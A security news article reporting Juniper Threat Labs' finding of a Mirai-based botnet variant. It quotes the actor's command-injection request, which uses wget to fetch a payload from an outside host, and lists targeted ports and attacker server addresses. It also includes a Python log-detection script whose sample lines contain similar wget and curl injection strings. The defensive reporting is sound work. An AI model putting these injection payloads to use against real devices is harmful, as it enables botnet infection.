Attacker builds malware variant with leaked Mirai source code

The source code of Mirai was leaked in September 2016, on the hacking community Hackforums.

Just as in the legitimate software world, where plenty of code is available as open source for developers to build upon, the same is true in the cybercrime world.

In light of this, researchers at Juniper Threat Labs recently found a threat actor using the online handle “Priority” reusing the infamous Mirai malware source code to launch their own version of the malware.

According to the researchers, the version in question is based on two specific Mirai variants, Demonbot and Scarface. The former is built to target Hadoop, while the latter targets IoT devices and includes backdoors to maintain persistent access.

Exploiting these two, the attacker has been using a single command, “GET /shell?cd%20/tmp;%20wget%20http://45(.)13.58.4/;”, to target the following ports:

  1. 5500
  2. 5501
  3. 5502
  4. 5050
  5. 60001

It is worth noting that 6001 is the very first port to be attacked and also believed to be the prime target of the threat group.
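For defenders, the request string and port list above are enough to build a simple log-based detection. The following is an added example, not code from the article or from Juniper Threat Labs: it parses constructed web server access log lines (assumed format: source address, local port, then the usual combined-log fields; documentation-range addresses only), URL-decodes the request, and flags requests to /shell that carry the cd /tmp; wget command-injection pattern, noting whether the hit arrived on one of the ports listed in the article.

```python
import re
from urllib.parse import unquote

# Ports the article lists as scanned by this Mirai variant
TARGET_PORTS = {5500, 5501, 5502, 5050, 60001}

# Assumed log layout for this example: "<src> <local-port> - - [ts] "<request>" <status> <bytes>"
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<port>\d+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# Indicators of the /shell command-injection request described in the article
SHELL_PATH = "/shell"
INJECTION_MARKERS = ("cd /tmp", "wget ", "curl ", ";")


def classify(line):
    """Return a dict describing the hit, or None if the line is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("path"))          # %20 -> space, etc.
    path, _, query = decoded.partition("?")
    if path != SHELL_PATH:
        return None
    markers = [k for k in INJECTION_MARKERS if k in query]
    if not markers:
        return None
    port = int(m.group("port"))
    return {"src": m.group("src"), "port": port, "known_port": port in TARGET_PORTS,
            "markers": markers, "query": query}


def scan(lines):
    """Run classify() over an iterable of log lines and return only the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (documentation-range addresses; not taken from the article)
SAMPLE_LOG = [
    '203.0.113.10 60001 - - [10/Sep/2020:01:02:03 +0000] "GET /shell?cd%20/tmp;%20wget%20http://198.51.100.7/; HTTP/1.1" 404 0',
    '203.0.113.11 80 - - [10/Sep/2020:01:02:04 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.12 8080 - - [10/Sep/2020:01:02:05 +0000] "GET /shell?cd%20/tmp;%20curl%20http://198.51.100.7/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The third sample line shows why matching on the decoded query rather than the exact string matters: a curl-based variant on an unlisted port is still caught, with known_port set to False.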

Since Priority uses only a single exploit, there is reason to believe the attacker is not a sophisticated actor. This should not be a surprise, since open-source code and internet access allow virtually anyone with a little know-how to conduct such attacks.

With the attackers active since September 10, 2020, as shown in the chart above, their servers have been found at the IP addresses 128(.)199.15.87 and 64(.)227.97.145, both hosted in Digital Ocean’s Santa Clara data center. Explaining the attacker’s choice, researchers at Juniper stated in a blog post that:

Digital Ocean is a well-known VPS provider that allows for quick setup and destruction of Virtual Private Servers. These servers are a mainstay for hackers to pop up, launch their attacks and then destroy their servers at low cost.

In addition, another VPS provider, Heficed, was used to host the malware itself.

To conclude, this new variant has been named Trojan.Mirai.6981169 by Juniper Labs, and Priority appears to be inactive for the moment.

This is just another example of how fighting only the original malware, Mirai itself, will not be enough, since variants derived from such projects will keep appearing and posing new threats. Cybersecurity professionals therefore need to be prepared to see not only more variants of Mirai but of other malware as well.
